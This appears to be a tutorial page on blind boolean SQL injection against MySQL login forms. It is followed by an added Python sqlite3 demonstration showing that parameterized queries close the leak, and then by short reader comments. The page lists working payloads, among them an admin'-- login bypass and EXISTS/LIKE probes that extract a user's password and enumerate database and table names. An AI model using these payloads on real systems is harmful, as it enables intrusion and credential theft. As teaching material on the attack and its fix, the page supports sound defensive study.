admin'--'
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%') AND ''='
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'w%') AND ''='
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%d%') AND ''='
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '___w%') AND ''='
' OR (SELECT COUNT(*) FROM users)>10 AND ''='
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
' OR EXISTS(SELECT * FROM users WHERE name!='jake' AND name LIKE '%a%') AND ''='
In the previous examples we cheated a little. You knew that the table containing user names and passwords was called users and you knew that it had two columns, name and password. In some cases you do not know the name of the table or the column names, but you can use the same techniques to find these out.
First you need to find out the name of the database that you are using. The MySQL function DATABASE() returns that value, but it is not shown to you directly, so you have to guess at it with true/false tests as before. When you know the name of the database being used you can take guesses at the names of the tables.
Does the current database contain the letter j?
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
Is there a table called one in database test?
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
Is there more than one table in the database(s) whose name contains a j?
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
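Why these true/false probes give an answer at all, and what removes the answer, shown as an added example that is not part of the original page. It assumes the application builds a login query of the form `WHERE name='...' AND password='...'` by string concatenation (the page does not show the query), uses Python's sqlite3 in place of MySQL, and runs against constructed sample rows.

```python
import sqlite3

# Two probes copied from the page: "contains a w" and "starts with w".
PROBE_CONTAINS_W = ("' OR EXISTS(SELECT * FROM users WHERE name='jake' "
                    "AND password LIKE '%w%') AND ''='")
PROBE_STARTS_W = ("' OR EXISTS(SELECT * FROM users WHERE name='jake' "
                  "AND password LIKE 'w%') AND ''='")


def make_db():
    """In-memory database with constructed sample rows (not from the page)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("jake", "swordfish"), ("admin", "correct-horse")])
    return db


def login_concatenated(db, name, password):
    """Assumed vulnerable form: user input is pasted into the SQL text."""
    sql = ("SELECT COUNT(*) FROM users "
           f"WHERE name='{name}' AND password='{password}'")
    return db.execute(sql).fetchone()[0] > 0


def login_parameterized(db, name, password):
    """Hardened form: input is bound as data and never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE name=? AND password=?"
    return db.execute(sql, (name, password)).fetchone()[0] > 0


def leaks_boolean_oracle(login, db):
    """True if the login result differs between the two probes, i.e. the
    response reveals whether the injected EXISTS(...) condition held.
    With the sample password 'swordfish' the first condition is true and
    the second is false."""
    contains = login(db, "nobody", PROBE_CONTAINS_W)
    starts = login(db, "nobody", PROBE_STARTS_W)
    return contains != starts


if __name__ == "__main__":
    db = make_db()
    for fn in (login_concatenated, login_parameterized):
        print(fn.__name__, "leaks:", leaks_boolean_oracle(fn, db))
```

With bound parameters both probes are compared against the stored password as ordinary strings, so the login fails the same way for each and the response carries no information about the table contents.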
hackindia, please send some tips on ethical hacking... I'm a newbie beginner
email id: slayerpuppet@gmail.com
Hi!
Where to type those codes?
really good